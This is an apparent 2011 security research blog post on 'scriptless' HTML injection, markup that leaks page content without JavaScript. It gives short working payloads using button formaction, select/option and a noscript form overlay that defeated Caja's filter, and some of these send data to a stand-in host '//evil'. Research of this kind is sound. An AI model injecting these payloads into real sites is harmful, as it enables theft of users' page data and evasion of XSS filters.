HTML scriptless attacks
Wednesday, 21 December 2011
Following up on @lcamtuf’s post about a “post xss” world. I thought I’d chip in with some vectors he missed. The textarea consumption technique he mentioned isn’t new and wasn’t invented by “Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson.” it was openly discussed on sla.ckers for many years (as usual) but anyway lets discuss vectors.
Button as a scriptless vector
Using button is interesting because of two interesting specification changes in HTML5, one is the fact that the default type for a button is a submit and secondly the formaction attribute allows you to change it’s parent form action. In addition button consumes HTML, allowing you store any html after button until the next or non existent closing button tag. Example vector:
<button name=xss type=submit formaction=//evil>I get consumed!
Option as a scriptless vector
A strange fact is option also consumes HTML, pretty obvious when you think about it but could lead to info disclosure like the button example.
<form action=//evil><select name=xss><option><b>steal me!</b>
@import as a scriptless vector
The CSS specification states that @import should continue parsing a url until it encounters a ending “;”. This means you can use it to consume HTML. A vector like the following can steal data:
Noscript scriptless vector
Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja’s HTML filter.
<noscript><form action=http://google.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents></noscript>
Using window.name via base target
You can also use the target attribute to assign the contents of the HTML after to the window name and then later retrieve it x-domain after a user clicks an external link.
So here we inject a base tag with a target attribute, the target then assigns everything after ‘ to the window.name and then can be retrieved when the user clicks to the external server.
That’s all folks.